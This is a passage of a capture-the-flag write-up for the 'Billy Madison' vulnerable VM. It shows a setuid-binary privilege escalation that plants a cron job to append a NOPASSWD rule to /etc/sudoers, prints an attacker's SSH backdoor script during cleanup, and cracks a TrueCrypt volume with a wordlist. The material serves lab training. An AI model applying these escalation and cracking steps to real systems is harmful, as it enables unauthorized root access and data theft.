/bin/su 1179758 28 -rwsr-xr-x 1 root root 27608 May 26 18:31 /bin/umount 1190647 32 -rwsr-xr-x 1 root root 30800 Mar 11 2016 /bin/fusermount 1179724 44 -rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6 1179723 44 -rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping 1190681 140 -rwsr-xr-x 1 root root 142032 Feb 17 2016 /bin/ntfs-3g
/usr/local/share/sgml/donpcgd binary runs as
root. If we run the binary, it prompts for two paths.
eric@BM:~$ /usr/local/share/sgml/donpcgd Usage: /usr/local/share/sgml/donpcgd path1 path2
If we provide two paths, a file gets created at the second path that is writable by
eric. We can create files in any location, as demonstrated below.
eric@BM:~$ /usr/local/share/sgml/donpcgd /dev/null /etc/testing #### mknod(/etc/testing,21b6,103) eric@BM:~$ ls -lah /etc/testing crw-rw-rw- 1 root root 1, 3 Sep 15 10:22 /etc/testing
I attempt to exploit this by creating a
cron.hourly entry, which will add the
eric user as a
eric@BM:~$ touch /tmp/test eric@BM:~$ /usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test #### mknod(/etc/cron.hourly/test,81b4,0) eric@BM:~$ echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test eric@BM:~$ chmod +x /etc/cron.hourly/test eric@BM:~$ cat /etc/cron.hourly/test #!/bin/bash echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
Now, I wait..
..after an hour or so, I check to see if I can
eric@BM:~$ sudo su root@BM:/home/eric# id uid=0(root) gid=0(root) groups=0(root) root@BM:/home/eric#
root@BM:/home/eric# cd root@BM:~# ls -lah total 92K drwx------ 8 root root 4.0K Sep 15 11:02 . drwxr-xr-x 25 root root 4.0K Aug 30 01:15 .. -rw------- 1 root root 26 Sep 15 11:01 .bash_history -rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc drwx------ 3 root root 4.0K Aug 11 22:30 .cache drwxr-xr-x 2 root root 4.0K Aug 22 21:24 checkban -rwxr-xr-x 1 root root 112 Aug 21 22:11 cleanup.sh -rwxr-xr-x 1 root root 59 Aug 21 22:12 ebd.sh -rw-r--r-- 1 root root 35 Aug 21 16:51 ebd.txt -rwxr-xr-x 1 root root 102 Aug 20 12:45 email.sh -rwxr-xr-x 1 root root 63 Aug 19 17:26 ftp.sh -rwxr-xr-x 1 root root 1020 Aug 20 14:00 fwconfig.sh drwx------ 2 root root 4.0K Aug 21 15:58 .gnupg drwxr-xr-x 3 root root 4.0K Aug 12 22:53 .m2 drwxr-xr-x 2 root root 4.0K Aug 11 22:17 .nano -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 66 Aug 15 10:16 .selected_editor drwxr-xr-x 2 root root 4.0K Aug 22 21:19 ssh -rwxr-xr-x 1 root root 33 Aug 11 22:51 ssh.sh -rwxr-xr-x 1 root root 69 Aug 15 20:54 startup.sh -rwxr-xr-x 1 root root 122 Aug 17 22:55 telnet.sh -rw-r--r-- 1 root root 222 Aug 20 21:58 .wget-hsts -rwxr-xr-x 1 root root 230 Aug 16 17:08 wp.sh
So, that's not the end of the story. In order to consider this VM as complete, we need to undo the changes made by
eric, and to find
eric has hidden the paper, and he's forgotten where he's hidden it. Great.
So, what has
eric has setup a backdoor, in the form of an
ssh server that only comes up once an email is received with a specific phrase. We firstly should remove the
cron entry that watches out for this phrase, by removing line
25 from the
root user's crontab.
*/1 * * * * /root/ssh/canyoussh.sh
This script will check to see if the phrase has been received in an email, and open up access to the
ssh server when it's found.
root@BM:~# cat ssh/canyoussh.sh NOW=$(date +"%Y-%m-%d-%H-%M-%S") if grep -w "My kid will be a soccer player" /home/WeaselLaugh/*; then sudo iptables -A INPUT -p tcp --dport 1974 -m conntrack --ctstate NEW,ESTABLISHED -j ACCEPT echo $NOW > /home/WeaselLaugh/ebd.txt echo Erics backdoor is currently OPEN >> /home/WeaselLaugh/ebd.txt fi
Next we should disable this service completely. Which service is responsible?
root@BM:~# netstat -tulpn | grep 1974 tcp 0 0 0.0.0.0:1974 0.0.0.0:* LISTEN 2629/sshd tcp6 0 0 :::1974 :::* LISTEN 2629/sshd
Fair enough - we should disable
ssh until we can clean up the system by removing malicious users.
root@BM:~# update-rc.d ssh disable insserv: warning: current start runlevel(s) (empty) of script `ssh' overrides LSB defaults (2 3 4 5). insserv: warning: current stop runlevel(s) (2 3 4 5) of script `ssh' overrides LSB defaults (empty).
When we're done, we should also terminate the service with
service ssh stop - ensuring we retain access by some other method.
We should proceed to remove the malicious
eric user from the target.
root@BM:~# userdel eric
We don't provide the
-r flag, so
eric's home directory and spool are preserved. We should retrieve and subsequently remove these by hand.
As we were able to elevate to
root using the binary at
/usr/local/share/sgml/donpcgd, we should probably take a copy of this file and then remove it from the system.
Web / ftp root
eric has completely defaced the web server, so cleaning it out is probably a good course of action. As we don't have a backup available, simply removing all files from the web root will suffice (after we've taken a copy of them for later reference). In addition, we should take the same action against the
ftp server appears to be legitimate, the port knocking sequence has now been compromised, and should be changed. We can do this by editing the
knockd config file at
As part of cleaning up the target, we should probably go about changing passwords for all users on the target, including the users for the
There was quite a bit to clean up here. The above is by no means an exaustive list, but it should suffice in order to wrestle control away from
eric, and prevent him from gaining a foothold on the server again.
After browsing through the filesystem, we find a directory at the root named
PRIVATE. Within here, we find two files.
root@BM:~# ls -lah /PRIVATE total 1.1M drwx------ 2 root root 4.0K Aug 29 09:58 . drwxr-xr-x 25 root root 4.0K Aug 30 01:15 .. -rw-rw-r-- 1 billy billy 1.0M Aug 21 16:42 BowelMovement -rw-r--r-- 1 root root 221 Aug 29 09:08 hint.txt
hint.txt, which reveals our next course of action.
root@BM:~# cat /PRIVATE/hint.txt Heh, I called the file BowelMovement because it has the same initials as Billy Madison. That truely cracks me up! LOLOLOL! I always forget the password, but it's here: https://en.wikipedia.org/wiki/Billy_Madison -EG
First I use
cewl to generate a wordlist from the Wikipedia entry.
root@kali:~# cewl --depth 0 -w billy-wiki.list https://en.wikipedia.org/wiki/Billy_Madison CeWL 5.2 (Some Chaos) Robin Wood (firstname.lastname@example.org) (https://digi.ninja/)
So, what kind of file is
root@kali:~# file BowelMovement BowelMovement: data
Well..damn. I can't see any recognisable header, so take a stab in the dark and try
truecrypt. To crack
truecrypt volumes, we use the tool
root@kali:~# truecrack -w billy-wiki.list -t BowelMovement TrueCrack v3.0 Website: http://code.google.com/p/truecrack Contact us: email@example.com Found password: "execrable" Password length: "10" Total computations: "603"
Well, what do you know! In order to mount this, I install veracrypt. Then I mount the volume, and check out the contents.
root@kali:~# veracrypt -tc BowelMovement billy-vera Enter password for /root/BowelMovement: Enter keyfile [none]: Protect hidden volume (if any)? (y=Yes/n=No) [No]: root@kali:~# cd billy-vera root@kali:~/billy-vera# find . -ls 1 16 drwx------ 3 root root 16384 Dec 31 1969 . 65 1 -rwx------ 1 root root 1000 Aug 21 10:22 ./secret.zip 66 1 drwx------ 2 root root 512 Aug 21 10:39 ./$RECYCLE.BIN 68 1 -rwx------ 1 root root 129 Aug 21 10:39 ./$RECYCLE.BIN/desktop.ini
I proceed to unzip
secret.zip, and am met with success!
root@kali:~/billy-vera# unzip secret.zip Archive: secret.zip inflating: Billy_Madison_12th_Grade_Final_Project.doc inflating: THE-END.txt root@kali:~/billy-vera# cat THE-END.txt Congratulations! If you're reading this, you win! I hope you had fun. I had an absolute blast putting this together. I'd love to have your feedback on the box - or at least know you pwned it! Please feel free to shoot me a tweet or email (firstname.lastname@example.org) and let me know with the subject line: "Stop looking at me swan!" Thanks much, Brian Johnson 7 Minute Security www.7ms.us
For completeness, the 12th grade final project consisted of..
Billy Madison Final Project Knibb High The Industrial Revolution The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way." The world was changing, and the puppy was getting... bigger. So, you see, the puppy was like industry. In that, they were both lost in the woods. And nobody, especially the little boy - "society" - knew where to find 'em. Except that the puppy was a dog. But the industry, my friends, that was a revolution. KNIBB HIGH FOOTBALL RULES!!!!! https://www.youtube.com/watch?v=BlPw6MKvvIc -BM
This VM was a treat - such a creative piece of work, and great fun to work through. I love the additional steps required to complete by means of finding and decrypting
bill's document, and detailing steps to clean up after
eric's intrusion. Really, great work.